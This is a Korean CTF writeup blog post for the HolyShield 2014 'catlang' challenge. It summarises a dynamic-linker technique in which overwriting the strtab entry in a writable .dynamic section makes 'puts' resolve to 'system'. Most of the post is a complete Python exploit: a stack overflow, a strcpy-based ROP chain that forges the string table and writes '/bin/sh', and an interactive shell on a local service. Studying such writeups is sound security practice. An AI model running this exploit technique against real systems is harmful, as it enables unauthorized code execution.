[exploit] 홀리쉴드 2014 catlang writeups

와...일단 풀이 올리기 전에 굉장한 기술문서를 작성한 pwn3r님 감사드리면서 기술문서도 함께 올리겠습니다...

reusing_dynamic_linker_for_exploitation_pwn3r.pdf

기술문서 요약 : dynamic에 쓰기권한이 있을 때 strtab부분을 수정하여 원하는 함수를 호출할 수 있다.

<문제 binary>

catlang

#!/usr/bin/env python
import socket
import struct
import telnetlib

p  = lambda x: struct.pack( "<I", x )
up = lambda x: struct.unpack( "<I", x )[0]

def until_recv( st ):
    buf = ''
    while st not in buf:
        buf += s.recv( 1024 )
    return buf

host = 'localhost'
port = 1120

s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )
raw_input( 'go!!' )

### exploit ###
dynamic = 0x804900c
strtab  = dynamic + 0x4c
strcpy = 0x80485a0
ppr    = 0x8048cd1

## stage 1 : make *fake_strtab
l = 0x80482bc, 0x8048514, 0x804847a, 0x804847b  # 0x30, 0x93, 0x04, 0x08
strtab_ptr = 0x80491b0

pay = 'yaong'
pay += 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb'    # BOF from ret( 0x8048b8b ), because this function( sscanf() ) 
pay += p( strcpy )
pay += p( ppr - 0x175) 
pay += p( strtab_ptr )
pay += p( l[0] )
for i in range( 1, len( l ) ):
    pay += p( strcpy )
    pay += p( ppr )
    pay += p( strtab_ptr + i )
    pay += p( l[i] )

## stage 2 : make fake puts( *strtab + 0x4f ), offset( 0x4f ) is my case
## "puts" -> "system"
l = 0x8048142, 0x80483a1, 0x8048142, 0x8048375, 0x8048392, 0x80483a8, 0x8048385 # s, y, s, t, e, m
fake_strtab = 0x8049330
for i in range( len( l ) ):
    pay += p( strcpy )
    pay += p( ppr )
    pay += p( (fake_strtab + i) + 0x4f )    # 0x4f = 'puts'_offset - strtab
    pay += p( l[i] )

## stage 3 : overwrite _DYNAMIC+0x4c ( strtab )
dynamic = 0x0804900c 
strtab  = dynamic + 0x4c
pay += p( strcpy )
pay += p( ppr )
pay += p( strtab )
pay += p( 0x80491b0 )   # *0x80491b0 = 0x8049330

## stage 4 : make system() argument
l = 0x8048350, 0x8048374, 0x804837b     # ls\x00
l = 0x80489bf, 0x804837e, 0x804838d, 0x804838e, 0x80489bf, 0x8048374, 0x804839a, 0x804837b     # /bin/sh\x00
arg = 0x80493bf
for i in range( len( l ) ):
    pay += p( strcpy )
    pay += p( ppr )
    pay += p( arg + i )
    pay += p( l[i] )

puts_plt = 0x80485b0

pay += p( puts_plt + 6 )    # trigger!!!!!
pay += p( 0xdeadbeef )
pay += p( arg )
pay += "\n"

print until_recv( ">> " )
s.send( pay )

print 'sh #'
t = telnetlib.Telnet()
t.sock = s
t.interact()

저작자표시

'Security > [게임] CTF 풀이' 카테고리의 다른 글

[exploit] DEFCON CTF Qualifier 2015, babyecho Writeups (3)	2015.05.18
[exploit] Plaid CTF 2015 EBP writeup (0)	2015.04.24
[misc] 홀리쉴드 2014 magiceye writeup (0)	2014.11.25
[exploit] 홀리쉴드 2014 kitty writeups (1)	2014.11.25
[exploit] 2013 SECUINSIDE movie_talk writeups (0)	2014.11.19

Hello, Stranger

[exploit] 홀리쉴드 2014 catlang writeups

'Security > [게임] CTF 풀이' 카테고리의 다른 글

티스토리툴바

[exploit] 홀리쉴드 2014 catlang writeups

'Security > [게임] CTF 풀이' 카테고리의 다른 글

관련글

티스토리툴바